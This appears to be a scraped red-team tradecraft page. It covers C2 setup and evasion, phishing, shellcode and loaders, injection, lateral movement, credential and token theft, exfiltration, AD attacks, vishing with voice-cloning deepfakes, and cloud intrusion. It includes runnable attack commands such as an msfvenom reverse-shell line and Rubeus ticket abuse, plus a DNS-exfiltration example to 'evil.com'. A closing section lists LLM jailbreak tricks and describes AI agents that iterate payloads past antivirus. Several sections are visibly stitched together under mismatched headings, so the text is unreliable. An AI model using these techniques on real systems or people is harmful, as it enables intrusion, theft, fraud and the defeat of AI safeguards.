MSSQL Linked Server → Multi-Hop → CREATE ASSEMBLY → Implant
Initial MSSQL access
linked server
Chain through links
enable CLR
CREATE ASSEMBLY .NET DLL
execute
C2 implant in MSSQL process
NTLM Reflection → SMB to LDAPS → Full Domain Compromise
Coerce NTLM auth
CVE-2025-33073
SMB to LDAPS relay
bypass signing+binding
Modify AD objects
RBCD/ShadowCred
Domain compromise
// C2 Frameworks Deep Dive
Command and Control is the backbone of any red team operation. Choosing the right framework determines your capabilities, OPSEC profile, and flexibility.
C2
Cobalt Strike
The industry standard — Beacon payload, Malleable C2, mature ecosystem
Mimic: jQuery, Amazon, Google APIs, Microsoft update traffic
Critical settings: set sleeptime, set jitter, set useragent
Host header: For domain fronting — header "Host" "legit.azureedge.net";
Post-ex: Configure spawn-to process, injection method, named pipe names
JARM fingerprint: Default CS JARM is signatured — use custom TLS or nginx in front
Test: c2lint to validate profile before deployment
INFRA
Infrastructure as Code
Automate infra deployment — spin up/tear down in minutes
Terraform: Provision VPS, DNS records, CDN, and firewall rules
Ansible: Configure team servers, install tools, deploy redirectors
Red-Baron: Terraform modules specifically for red team infra
RedInfra / Nebula: Pre-built red team infrastructure templates
Benefits: Consistent deployments, fast teardown, version-controlled, repeatable
Tip: Keep Terraform state encrypted — it contains all IP addresses and configs
INFRAC2
Advanced C2 Redirectors
Living-off-the-cloud redirectors — route C2 through legitimate infrastructure that defenders can't block
GraphStrike: Routes Cobalt Strike traffic over Microsoft Graph API — blends into legitimate M365 traffic
ProxyBlob: Reverse SOCKS5 over Azure Blob Storage — slower but bypasses Netskope and most network security products
Turnt: SOCKS proxy over TURN servers (Teams/Zoom endpoints) — tunnels through legitimate TURN infrastructure
Stillepost: Proxy C2 HTTP through Chromium browser via Chrome DevTools Protocol — traffic appears as legitimate browsing
SSH SOCKS: Built-in Windows SSH client (ssh -R 1080 USER@VPS) creates SOCKS proxy through VPS — works against CrowdStrike. Run over port 443 if 22 blocked
Azure Functions relay: Beacon IDs in HTTP headers on POST, parameters on GET — Azure Function proxies to team server
Cloudflare Workers: Redirector logic on Cloudflare edge — traffic from Cloudflare IPs, impossible to block without blocking all Cloudflare
ICMP C2 (UDC2): CS 4.12 feature. Redirector via custom TTL values (start at 255, forward if TTL>170) — normal pings never reach that
INFRAC2
CS 4.12 & AI-Integrated C2
Cobalt Strike 4.12 features and MCP-based AI integration for autonomous operations
CS 4.12 UDC2: User Defined Command and Control — ICMP channel support, custom C2 channel development via IAT hooks
CS 4.12 REST API: Full API access to CS operations — enables automation and AI integration
CS 4.12 injection: New process injection options and refreshed GUI
CS-MCP: AI-powered CS management via Model Context Protocol — Claude/LLM drives operations through REST API
Venom C2: Dependency-free Python3 C2 with WDAC bypass — extends Loki C2, built for persistence mid-engagement
Residential proxies: IPRoyal, SmartProxy, Decodo, BrightData for IP rotation — blend with legitimate traffic from same region
Sourcepoint + favicon.ico trick: Profile customization and beacon detection evasion
INFRAOPSEC
Infrastructure OPSEC
Operational security for attack infrastructure — don't let your attack boxes betray you
Hostname OPSEC: Always rename attack boxes to match client naming convention. hostnamectl for persistent change — hostname is temporary on Debian. Kali hostnames are instantly flagged
fakeprinter: Python scripts making your box appear as HP printer — fake printer services on expected ports
Artillery: Honeypot alerter on attack box — detect when defenders start probing your infrastructure
RedELK: Red Team's SIEM — operational logging, monitoring, and detection of blue team investigation
Ghostwriter: Report writing + infrastructure management platform for tracking ops
SOCKS OPSEC: Avoid default signatured tools (Impacket, CrackMapExec) over SOCKS. Prefer TrustedSec BOFs for post-exploitation
VECTR: Purple team tracking — log TTPs, track detection status, maintain engagement records
Environmental keying: Offload checks to server-side for payload delivery decisions — DoH for DNS-based keying
// Initial Access
Getting that first callback. Phishing remains the most common vector, but the techniques evolve constantly as email gateways and endpoint protections improve.
ACCESS
HTML Smuggling
Deliver payloads through HTML/JS — bypasses email gateways and proxies
Embed payload as base64 or encrypted blob inside an HTML file
JavaScript decodes and offers the file for download when opened in browser
Bypasses: Email attachment scanners only see an HTML file, not the payload inside
SharePoint spoof: Remove Exchange license from M365 user → share SPO file → sends from no-reply@sharepointonline.com with full DMARC pass
Trusted platform abuse: DocuSign, AdobeSign, SurveyMonkey, Microsoft Forms — all send from allowlisted domains
iCal organizer spoof: Outlook renders calendar invites based on ICS organizer field, not actual sender — populate with internal email for avatar + trust
Hook emails: Send benign emails first to build sender reputation with target + email gateway, then malicious follow-ups
Hidden text salting: Insert invisible text in email HTML to confuse keyword-based detection engines
decode-spam-headers: Decode opaque spam headers to understand why emails hit spam
// Payload Development
The payload is what runs on the target. Loaders, shellcode, and delivery mechanisms determine whether you get caught in seconds or maintain access for months.
PAYLOAD
Shellcode Generation
Raw position-independent code — the foundation of every payload
msfvenom: msfvenom -p windows/x64/meterpreter_reverse_https LHOST=x LPORT=443 -f raw
Cobalt Strike: Attacks → Packages → Windows Executable (Stageless) → Raw
Donut: Convert .NET assemblies, PE files, VBS, JS into position-independent shellcode
Donut -i beacon.exe -o beacon.bin -a 2 -f 1 — x64, raw format
sRDI: Shellcode Reflective DLL Injection — convert any DLL to shellcode
Custom: Write your own in C/Rust — avoid known signatures entirely
Encryption: Always encrypt shellcode at rest — XOR, AES, RC4 with runtime decryption
PAYLOAD
Shellcode Loaders
The code that decrypts, allocates, and executes your shellcode
wmic.exe: Execute XSL stylesheets with embedded JScript
cscript/wscript: Execute VBS/JS scripts natively
Reference: LOLBAS Project (lolbas-project.github.io) — full database
PAYLOAD
DLL Sideloading
Abuse DLL search order of signed binaries to load malicious DLLs
Concept: Signed EXE looks for a DLL → place your DLL where it searches first
Proxy DLL: Forward all original exports to the real DLL + add malicious code
Finding candidates: Spartacus, DLLSpy, Process Monitor (filter: NAME NOT FOUND)
Common targets: OneDrive, Teams, Slack, Chrome updater, printer drivers
Why it works: The signed EXE loads your DLL — EDR sees trusted process loading a DLL
Persistence: Drop sideload pair in user-writable path + scheduled task/Run key
OPSEC: Choose EXEs that normally load DLLs from their directory — avoid suspicious paths
PAYLOAD
Advanced Payload Engineering
Position-independent C/C++ compilation, metamorphic cross-compilation, and ML-based evasion
EPIC: Cross-platform C/C++ to PIC shellcode builder — modular compilation, minimal libc, dead function elimination
EPIC RBX trick: -ffixed-rbx GCC flag reserves RBX register for global R/W context across PIC — enables stateful shellcode
Dittobytes: Metamorphic cross-compilation of C++ to PIC, BOF, and EXE formats — each compile produces unique binary
Crystal Palace: Mudge's position-independent DLL loader linker from Tradecraft Garden
EvadeX: Commercial C# obfuscator effective against ML detections and static analysis
Shellcode encoding: Simple XOR is sufficient — encryption type (AES/RC4) largely irrelevant. RC4 via SystemFunction032/33 specifically detected by EDRs
Modern EDRs hook userland APIs, scan memory, inspect call stacks, and correlate telemetry. Every technique here addresses a specific detection mechanism.
LLM-assisted obfuscation: Prompt LLMs to reorder code, introduce junk with volatile/register, rework loops
// Process Injection Techniques
Running your code inside another process — the core tradecraft of any implant. Each technique has different detection signatures, OPSEC tradeoffs, and requirements.
INJECT
Classic Injection (VirtualAllocEx)
The textbook method — heavily detected but worth understanding as a baseline
Step 1: OpenProcess with PROCESS_ALL_ACCESS on target PID
Step 2: VirtualAllocEx — allocate RWX memory in remote process
Step 3: WriteProcessMemory — write shellcode to allocated region
Step 4: CreateRemoteThread — execute shellcode in new thread
Pass-the-Ticket (PtT): Inject stolen Kerberos TGT/TGS into current session — Rubeusptt /ticket:base64
Overpass-the-Hash: Use NT hash to request a Kerberos TGT — Rubeusasktgt /user:X /rc4:HASH. Converts NTLM material to Kerberos for environments blocking NTLM
Pass-the-Key: Same as overpass but using AES256 key instead of RC4/NT hash — less detectable, preferred when available
Pass-the-Certificate: Use stolen ADCS certificate for PKINIT authentication — Certipyauth -pfx cert.pfx
RDP Restricted Admin: mstsc /restrictedadmin allows RDP with just NT hash — must be enabled on target
Detection: Event 4624 Type 9 (PtH), 4768 with unusual encryption types (overpass), anomalous logon patterns
LATERALPRIVESC
Token Impersonation & Process Manipulation
Steal tokens from running processes to impersonate other users — fundamental post-exploitation tradecraft
Token impersonation: Duplicate access token from another process and use it to act as that user — requires SeImpersonatePrivilege
elevate_pid_bof: BOF that steals a process token by PID and spawns a new process under that token — inline, no fork & run
incognito: Classic token enumeration and impersonation — list all available tokens, impersonate any. Built into Meterpreter
Cobalt Strike: steal_token PID to impersonate, rev2self to revert. make_token for credential-based impersonation
Potato family: SweetPotato / PrintSpoofer / GodPotato — escalate from service accounts (SeImpersonate) to SYSTEM
RunasCs: Runas replacement with PTH support (dev branch) — create process with alternate credentials
Token types: Delegation tokens (interactive logons) are more useful than impersonation tokens (network logons)
OPSEC: Token theft is local — no network traffic, no new logon events. One of the quietest escalation techniques
LATERAL
SCShell & Service-Based Execution
Fileless lateral movement via service configuration changes — no new service creation, port 135 only
SCShell: Changes an existing service's binary path via ChangeServiceConfigA → starts service → code executes → restores original path
No Event 7045: Unlike PsExec, SCShell modifies existing services instead of creating new ones — avoids the #1 lateral movement detection
Port 135 only: Uses DCERPC/SVCCTL — does not require SMB (445) for file transfer
Fileless: No binary dropped to disk — the service binary path points to a command line (e.g., cmd /c payload)
XOR encrypted: Network traffic is XOR-encrypted to avoid signature detection
Authentication: Supports pass-the-hash natively — SCShell.exe target service user domain hash command
Modified SCShell: Find stopped services with DLLs NOT in System32 — replace the DLL and start the service. No config change needed, even stealthier
OPSEC: Event 7040 (service config change) may still fire — but far less monitored than 7045 (new service)
LATERAL
Advanced DCOM Techniques
Novel DCOM methods for fileless lateral movement with reduced detection surface
Fileless DCOM: Based on Forshaw research — weaponized for fileless lateral movement with free PPL protection for beacons
DCOM Upload & Execute: Remotely write custom payloads via DCOM to create embedded backdoor
GoExec DCOM htafile: Uses dcom/urlmon to load URL Moniker executing JScript/VB — stealthiest with inline JScript
BitlockMove: Lateral movement via Bitlocker DCOM interfaces + COM Hijacking
Cross-Session Activation: DCOM-based cross-session activation for lateral movement + privilege escalation
WMI Event Sub: Async WMI via Event Subscription to run DLL-hijackable binary. wmiexec-Pro — port 135 only, no 445
Modified SCShell: Find stopped services with DLLs NOT in System32 — replace DLL and start service. No config modification needed
LATERAL
RDP & WinRM Advanced
Programmatic RDP lateral movement and advanced WinRM techniques
SharpRDP: Send keystrokes programmatically over RDP — adjust for non-English keyboard layouts
Legal notice bypass: Send dismiss keystrokes to bypass RDP legal notice banners after connection
RDP relay: Impacket ntlmrelayx RDP relay server — relay RDP auth to SMB or HTTP
HiddenDesktop: HVNC for Cobalt Strike — hidden virtual desktop for interactive access
WinRM BOF: bof-winrm-client — WinRM client as Beacon Object File for inline execution
WinRM plugins: Exploit WinRM plugin loading for code execution and persistence
Invoke-SMBRemoting: Interactive shell over Named Pipes — fileless SMB lateral movement
RPC high ports: If 445/135 blocked, brute-force RPC high ports with atexec-pro — port 135 only
// Exfiltration & Data Staging
Getting data out without triggering DLP, proxy inspection, or network anomaly detection. Blend with normal traffic patterns.
EXFIL
HTTPS C2 Channel
Most common — exfiltrate data through the same C2 channel used for command and control
Simplest approach: Download file through Beacon — data flows through existing C2 channel
Chunking: Large files split into small chunks matching normal C2 traffic size
Malleable profile: Data embedded in POST body, cookies, or URL parameters mimicking legitimate traffic
Timing: Match exfil rate to normal C2 callback interval — don't suddenly spike bandwidth
Encryption: C2 channel is already encrypted (HTTPS + payload encryption)
Limitation: Slow for large volumes — constrained by C2 sleep time and chunk size
EXFIL
DNS Exfiltration
Encode data in DNS queries — works even in heavily restricted networks
Concept: Encode data as subdomains — base64data.evil.com → DNS query to your NS
dnscat2: Full C2 over DNS — TXT, CNAME, MX, A records
iodine: IP-over-DNS tunnel — full network connectivity through DNS
Slow: DNS has small payload per query (~250 bytes) — only for small data / C2
Bypasses: Most firewalls allow DNS (port 53) outbound — even air-gapped-ish networks
DOH (DNS-over-HTTPS): DNS queries via HTTPS to Cloudflare/Google — encrypted, harder to inspect
Detection: Anomalous DNS query volume, long subdomain strings, unusual record types
EXFIL
Cloud Storage Exfiltration
Upload data to legitimate cloud services — blends with normal SaaS traffic
OneDrive / SharePoint: Use victim's own M365 token to upload — appears as normal usage
Google Drive: OAuth token or service account upload — common enterprise traffic
Azure Blob Storage: SAS token upload — looks like normal Azure API calls
AWS S3: Pre-signed URL upload — single HTTPS PUT request
Dropbox / Box: API upload — allowed by many corporate proxies
OPSEC: Use the org's existing cloud provider — traffic to their own tenant is least suspicious
Operational security separates a noisy pentest from a realistic adversary simulation. Every action has a detection signature — know what you're generating.
Detection Risk by Action
ACTIONRISK LEVELDETECTION SOURCEPhishing email sentLOW Email gateway, user reporting
HTML smuggling openedLOW Browser telemetry (limited)
Shellcode loader executedMEDIUM AV static scan, AMSI (if not bypassed)
C2 beacon callbackLOW-MED Network IDS, JA3/JARM fingerprint
AMSI/ETW patchMEDIUM EDR memory integrity checks
Process injection (cross-process)HIGH Kernel callbacks, ETW, Sysmon 8/10
LSASS accessVERY HIGH ObRegisterCallbacks, Sysmon 10, EDR
Mimikatz executionVERY HIGH Static + behavioral + memory sigs
PsExec lateral movementHIGH Service creation 7045, named pipe, SMB write
WMI remote executionMEDIUM WMI-Activity log, Event 4648
DCOM executionLOW-MED Process creation from DCOM host process
Scheduled task creationMEDIUM Event 4698, Sysmon
Service creationHIGH Event 7045, Autoruns, EDR
DCSyncVERY HIGH Event 4662, DRS replication from non-DC
Large data transferHIGH DLP, NetFlow anomaly, proxy logs
DCSync from DC account: Use the DC's own machine account for DCSync — Elastic detection rules skip accounts ending in $
Certipy PKINIT evasion: Use Schannel authentication instead of PKINIT to avoid MDI detection. PKINITtools with modified etypes avoids alerts
ADCS recon via ADWS: Use Active Directory Web Services instead of LDAP for ADCS enumeration — different detection surface
Secretsdump IOC pipeline: CI/CD pipeline to automatically strip known Impacket indicators from tools before engagement
SCCM tool OPSEC: sccmhunter uses Impacket backend that triggers alerts — prefer LDAP queries or ldeep sccm module
OPSEC
Canary Token & Honeypot Detection
Detect traps before you trigger them — canary tokens, honey files, and ProjFS detection
IndicatorOfCanary: Detect canary tokens in documents, DNS, web, and other formats before triggering alerts
ProjFS detection: Use PrjGetOnDiskFileState API to detect ProjFS-tracked directories used by Thinkst canarytokens
AWS canary evasion: Thinkst canary tokens leak token ID in username — send fake events with spoofed IP to confuse SOC
EDR fake data awareness: Cortex and Defender hook API functions to return fabricated shares, users, and file paths to suspicious processes
Cortex fake data: Hooks samcli.dll functions (NetLocalGroupMembers, NetShareEnum) — validate data through alternative APIs
MDE emulator detection: Resolve MpSomeSandboxOnlyFunction via GetProcAddress — check for fake processes (mirc.conf) returned by emulator sandbox
Silverfort awareness: MFA across all protocols via DC agent — significantly complicates red team operations. Identify early
// Privilege Escalation
From standard user to SYSTEM, Domain Admin, or cloud admin. Local privilege escalation is often the first step after initial access — every path has different requirements and detection profiles.
PRIVESC
Local Privilege Escalation
Standard user to SYSTEM — service misconfigurations, installer abuse, and unpatched vulnerabilities
MSI installer repair: Abuse Windows Installer repair functionality to gain SYSTEM — historically ran with SYSTEM privs (CVE-2024-38014, now patched with UAC)
WSUS LPE: HTTP WSUS server exploitation with delivery optimization bypass — requires working around "delivery optimization" on Win11
CVE-2025-21204: Windows Update Stack privilege escalation — abuse update mechanism for SYSTEM
TrustedInstaller via DISM API: Elevate to TrustedInstaller service account using DISM — can stop PPL-protected EDR services
Domain escalation via Kerberos relay, delegation abuse, and certificate exploitation
KrbRelayUp: Kerberos relay-based local privilege escalation — relay Kerberos auth to gain SYSTEM
BadSuccessor (dMSA): Delegated Managed Service Account privilege escalation on Windows Server 2025 — unpatched at time of discovery. SharpSuccessor .NET PoC
NTLM Reflection (CVE-2025-33073): SMB to LDAPS relay possible even with LDAP signing AND channel binding enabled — far more serious than initially assessed
RBCD (Resource-Based Constrained Delegation): Still works after Shadow Credentials patch — set up delegation on computer objects you control
SPNless RBCD: RBCD without requiring SPN — broader applicability
S4U2Self: Use machine NT hash for ticket impersonation — request ticket as any user to the machine
SCCM NAA extraction: DonPAPI to dump Network Access Account secrets — Protected Users group may give invalid creds but they still work for spawning processes
Coercer: Windows authentication coercion tool — RPC over HTTP variant bypasses Cortex
// Active Directory Attacks
ADCS exploitation, Kerberos attack chains, Shadow Credentials, and comprehensive AD enumeration. Active Directory remains the primary target in enterprise red team engagements.
CREDPRIVESC
ADCS Exploitation (ESC1–ESC15)
Active Directory Certificate Services — the most prolific escalation path in modern AD environments
ESC1: Vulnerable template allows attacker to specify SAN (Subject Alternative Name) — request cert as any user
ESC4 → ESC1 chain: Modify vulnerable template to enable ESC1 exploitation — propagation to CA can take up to 8 hours
ESC4 → Enrollment Agent: Alternative when ESC1 conversion fails due to DNS SAN requirements (CERTSRV_E_SUBJECT_DNS_REQUIRED)
Golden Cert: Forge any certificate with stolen CA private key — ultimate persistence
Certipy: All-in-one ADCS exploitation — find, exploit, and forge certificates
Certify / Locksmith: .NET ADCS enumeration and exploitation alternatives
Server Authentication: Noted as neglected attack surface — server auth EKU enables additional escalation paths
Stealthy ADCS recon: Query via ADWS (Active Directory Web Services) instead of LDAP — avoids LDAP-based detection
CREDLATERAL
Kerberos & Delegation Attacks
Kerberoasting, Shadow Credentials, constrained/unconstrained delegation abuse, and ticket forging
Shadow Credentials: Microsoft Jan 2026 patch broke self-write of msDS-KeyCredentialLink — bypass: set CustomKeyInformation flags to 0x02 (MFA_NOT_USED), remove KeyApproximateLastLogonTimeStamp. keycred by RedTeam Pentesting
Kerberoasting evasion: Use --stealth flag in Impacket. Note: Microsoft killing RC4 in Kerberos by 2026 — impacts kerberoasting significantly
Kerberos relay over SMB: Relay Kerberos authentication through SMB for delegation abuse
DES (etype 3) abuse: Exploit weak encryption type in Kerberos for ticket attacks
Timeroasting: Attack based on Kerberos timestamp encryption — novel credential extraction technique
krbtgt rotation internals: Detailed architecture of ticket attacks, PAC, and trust exploitation
Unconstrained delegation: Monitor for TGTs on delegation hosts with Rubeus monitor — capture and reuse
Constrained delegation: S4U2Proxy abuse to access services as any user when delegation is configured
CRED
DCSync & NTDS Extraction
Extract domain credentials via replication protocol or direct NTDS.dit access
DCSync OPSEC: Use the machine account of a DC — selectively dump with --ntds --user X. Elastic rules skip $ accounts for Event 4662
DSInternals: DCSync from Windows — reportedly undetected by several EDRs. Also available as BOF
BYODC: Bring Your Own Domain Controller — set up rogue DC for stealthy replication
ADCSSync: Alternative to DCSync — requests certificate per user from ADCS instead of replicating. Works against Cortex DCSync prevention
VSS via SMB remotely: impacket smbclient list_snapshots to access Volume Shadow Copies — extract NTDS.dit bypassing Cortex protection
ntdsutil.exe snapshot: Mount VSS snapshot and copy locked files (NTDS.dit, SAM) — undetected by Cortex XDR
DPAPI domain backup key: DCSync retrieves the DPAPI domain backup key — decrypt any user's DPAPI-protected secrets
secretsdump.py IOC bypass: Pipeline to strip known Impacket indicators before engagement
CRED
Token & Session Theft
Extract Azure AD tokens, Primary Refresh Tokens, and Windows token broker cache from endpoints
Windows Token Broker Cache: NetExec wam module for extracting cached tokens from Windows machines
Entra Refresh Tokens: Extract refresh tokens from compromised endpoints via Beacon — survive password changes
aadprt BOF: Acquire Primary Refresh Tokens (PRT) from Azure AD joined machines — PRTs have MFA + device claims
AAD Broker LocalState: Extract tokens from hybrid-joined machines — SpecterOps research. Blocked by SentinelOne
SeamlessPass: Convert Kerberos tickets to M365 access tokens via Seamless SSO
SignalKeyBOF / WhatsAppKeyBOF: Extract encryption keys from Signal/WhatsApp desktop for message decryption
FriendlyFireBOF: Suspend non-GUI threads to silence Teams, Outlook, Slack during operations
Passwordless ops: When users have no passwords (FIDO2/WHfB only) — steal TGT from memory, extract PRT, use SeamlessPass
CRED
vSphere Attack Operations
Leverage VMware vSphere access for credential extraction via snapshots and VMDK cloning
Snapshot method: Create VM snapshot → download .vmem and .vmsn from datastore → convert with vmss2core to .dmp → mount with MemProcFS or extract with Volatility 3
VMDK clone method: Clone VM to template → download VMDK → parse with Volumiser to extract SAM/SYSTEM/SECURITY. 60GB+ downloads possible
SharpSphere: Tool for vSphere interaction — VM operations, guest file interaction
VM must be running: .vmem files only exist when VM is powered on — plan timing accordingly
MemProcFS: Mount memory dumps as filesystem — LSASS minidump blocked by default. Patch out single if-statement checking image name and recompile
Credential targets: Domain Controllers, Exchange servers, SCCM — any VM with valuable cached credentials
OPSEC: Snapshot creation may be logged — prefer VMDK clone for stealthier extraction
CRED
AD Enumeration & Tooling
Comprehensive AD enumeration tools and techniques for attack path discovery
BloodHound-CE: Custom queries at queries.specterops.io, cypherhound, compassSecurity/bloodhoundce-resources
dsquery.dll GUI: rundll32 dsquery.dll,OpenQueryWindow or Win+Ctrl+F for LDAP search GUI — useful in VDI/Citrix
bloodyAD: LDAP operations with certificates, PTH to LDAP for group modification — SOCKS compatible
godap: LDAP TUI with SOCKS tunnel support (-x flag) — interactive enumeration
ldap_shell: AD ACL abuse tool for direct LDAP operations
RelayInformer: Python/BOF utility to determine EPA (Extended Protection for Authentication) enforcement levels on relay targets
Misconfiguration-Manager: Central knowledge base for SCCM tradecraft — all attack paths documented
// MOTW Bypass & Delivery Techniques
Mark-of-the-Web controls are the frontline defense against downloaded payloads. These techniques bypass MOTW tagging, SmartScreen checks, and container-based protections.
MOTW
MOTW Bypass Techniques
Bypass Mark-of-the-Web tagging to avoid SmartScreen and Protected View
ADS (Alternate Data Streams): Payload hidden in NTFS ADS — OS does not propagate taint flags into internal data representations
Archive types preserving ADS: WinRAR (.rar) and 7zip WIM (.wim) format preserve ADS on extraction
Voice phishing, caller ID spoofing, deepfakes, and pastejacking. The human layer remains the weakest link — these techniques exploit trust, urgency, and helpfulness.
VISH
Caller ID Spoofing Infrastructure
Self-hosted PBX systems for caller ID spoofing — impersonate any phone number
Asterisk PBX: Self-hosted on Hetzner/AWS VPS — full control over outbound caller ID
StuntBanana: Minimalist Asterisk CID spoofer built for AWS deployment
FreePBX: Open-source IP PBX management — easier than raw Asterisk configuration
3CX + Skyetel: PBX with SIP trunk integration. Configure Skyetel creds + set outbound CID for spoofing
Skyetel: Requires only driver's license (US). Supports Clip No Screening. STIR/SHAKEN is the main blocker
Easybell (EU): Cloud PBX with CID spoofing configurable in web UI — use Zoiper as SIP client
AWS Connect: Only requires billing-configured account — simpler than Twilio
BluffMyCall: SaaS alternative ~$30/month for quick CID spoofing without infra setup
VISHAI
Voice Cloning & Real-Time Deepfake
Clone executive voices from public recordings — real-time voice conversion for live calls
ElevenLabs Multi-Language: Works great across languages (Polish, Dutch, etc.) — pair with Vapi.ai for real-time chat
w-okada voice-changer: Local real-time voice conversion — ~250ms delay. Route through Voicemeeter Potato for Teams/Webex
RVC (Retrieval-Based): High-quality offline voice cloning — needs good training model for target language
Training data: Find "fireside chats" or public recordings — edit ~30min down to ~10min of just the target voice
Deep-Live-Cam: Real-time face swap with single image — 15+ FPS on modern GPU. Pipe through OBS into Teams/Zoom
DeepFaceLive: Alternative real-time face swap — requires RTX 3080 Ti+ for usable framerate
Video calls: Combine voice clone + face swap for fully synthetic video call appearance
Hedra: AI video creation for generating social engineering videos with fully faked characters
SOCIAL
ClickFix / Pastejacking
Trick users into pasting malicious commands via fake CAPTCHAs and clipboard hijacking
Website contact features: Abuse "contact user" / "share file" features — sends from the company's own domain
LOTS Project: lots-project.com — comprehensive catalog of living-off-trusted-sites techniques
SOCIAL
Pretext Library & Vishing Scenarios
Proven pretexts for phone-based social engineering and callback phishing
IT Support / Patch Tuesday: Pose as IT calling about critical update — guide through manual steps
Employee benefits: PerksAtWork/TicketsAtWork pretexts especially effective around new year
Helpdesk attack (MGM-style): Target helpdesks as attack surface — request password resets with OSINT
Mail bombing + Teams call: Flood inbox with signup emails → call as IT via Teams → QuickAssist for remote control
Fabricated ID via Zoom: Present fake ID over video call for password reset verification (legal risks vary)
Developer targeting: Impersonate client developer with "compiler error" — ask to compile backdoored project
Device code via phone: "I need to verify your identity — I'm generating a unique code for you"
Pretext Project: pretext-project.github.io — open library of proven pretext ideas
// Cloud Attack Operations
Azure/Entra ID, AWS, and GCP attack techniques. Cloud environments have different attack surfaces, detection mechanisms, and persistence opportunities than traditional on-prem infrastructure.
CLOUD
Azure / Entra ID Initial Access
Password spraying, MFA fatigue, and token theft against Microsoft cloud identity
IP-rotated spraying: CredMaster with FireProx/AWS API Gateway for source IP rotation per request
Smart Lockout bypass: Residential proxy rotation targeting same region/city as target HQ
Common passwords: Start123, username==password (e.g., backup@contoso.com:backup), legacy ADSync'd accounts
MFA phone fatigue: m365-fatigue — trigger alternative MFA (phone calls) until user accepts. Must avoid flooding detection
UPN vs email mismatch: User Principal Name may differ from email. TeamsEnum to pull real UPNs for spraying
Direct Send connector: M365 direct send open by default — telnet to .mail.protection.outlook.com:25
Cross-platform techniques for non-Windows environments. Linux boxes commonly lack EDR, and macOS has unique security boundaries (TCC, Gatekeeper) that require specific bypass knowledge.
MACOS
macOS Initial Access & Persistence
macOS-specific attack vectors, persistence mechanisms, and security bypass
Homebrew abuse: Similar to Chocolatey on Windows — create malicious packages for code execution
VS Code extension abuse: Exploit VS Code's bootstrapping to quietly load malicious plugins
Electron/Node.js stealers: Very low detection rates — hard to distinguish from legitimate apps at binary level
BLE C2 implant: Client/server using Bluetooth Low Energy — no complaints from TCC, Gatekeeper, or code signing
BLE password exfil: Exfiltrate passwords from fake macOS prompts over BLE to nearby laptop
Bloatware LPE: Vendor hardware driver update software running as SYSTEM with browser-accessible local APIs
pamspy: Linux/macOS credential dumper using eBPF — hooks PAM to capture sudo/su/ssh credentials
LINUX
Linux Post-Exploitation
Linux systems commonly lack EDR — outbound traffic is less anomalous than Windows
Linux beachheads: Linux systems often have blinder/missing EDR agents — ideal for initial beachhead
Kerberos on Linux: Tickets stored in /tmp/krb5cc_* or kernel keyring — steal for PtT attacks
pamspy: eBPF-based credential capture — hooks PAM for sudo/su/ssh without needing a PAM module
SSH key harvesting: Search for ~/.ssh/id_*, authorized_keys, known_hosts for lateral movement targets
npmphish: Device code phishing for npmjs.com — capture sessions and backdoor packages
pip/npm supply chain: Backdoored packages targeting internal caches (Artifactory) rather than public PyPI
WSL Payload Builder: Create custom WSL distributions with embedded payloads
// AI-Assisted Operations
LLM jailbreaking, AI-driven C2, autonomous agents, deepfake generation, and AI-assisted code development. The intersection of AI and offensive security is rapidly expanding the operator's toolkit.
AI
LLM Jailbreaking & Uncensoring
Bypass LLM safety alignment to generate offensive content — from prompt tricks to model surgery
Crescendo: Multi-turn jailbreak using smart many-shot prompts to gradually coerce restricted conversations
L1B3RT4S: Collection of LLM jailbreak/liberation prompts for various models
Abliteration: FailSpy/abliterator removes safety alignment from LLMs. Create LoRA from diff, apply to other models
Court order trick: Present fake "court order" to LLMs to bypass content restrictions
Keyword substitution: Replace flagged words ("spoof" → "normalization") to bypass content filters
Role declaration: "I am a cybersecurity researcher" reduces refusals in most commercial LLMs
Local uncensored: Run llama2-uncensored via Ollama — no guardrails, full offensive capability
Red Team Arena (redarena.ai): Platform for practicing LLM jailbreak techniques
AIC2
AI-Driven C2 & Autonomous Agents
LLM-powered command and control — non-deterministic code generation that defenders can't signature
AI C2 architecture: Human query → LLM generates Python/Lua code → feed into C2 agent loader — code unknown to defenders
Claude-C2: Uses MCP (Model Context Protocol) server for C2 communication — Claude makes API calls to create/retrieve tasks
Drone: NLP for on-host actions — "scan the local subnet for machines with RDP open"
Mythic MCP: Claude Sonnet driving Mythic C2 (Apollo agent) via MCP protocol
LitterBox MCP: Iteratively test payloads against detection, edit and recompile until bypassing Defender
Nerve: Create LLM agents via YAML tasklets — autonomous vulnerability discovery (found RCE in WordPress plugins)
Runtime code generation: LLM generates code not in the binary, kept in memory only — like BOF extensibility but non-deterministic
Windows MCP: Microsoft announced MCP for Windows OS — OS now AI-agent accessible for LotL tactics
AISOCIAL
AI for Phishing & Social Engineering
AI-generated landing pages, foreign language phishing, and realistic visual content
SitesGPT: AI website builder producing realistic sites with non-obvious AI images — source code downloadable
Cursor/Windsurf/Bolt: AI-powered editors for creating phishing landing pages with self-decrypting capabilities
Foreign language phishing: LLMs apply idioms, dialects, and specific wording far better than Google Translate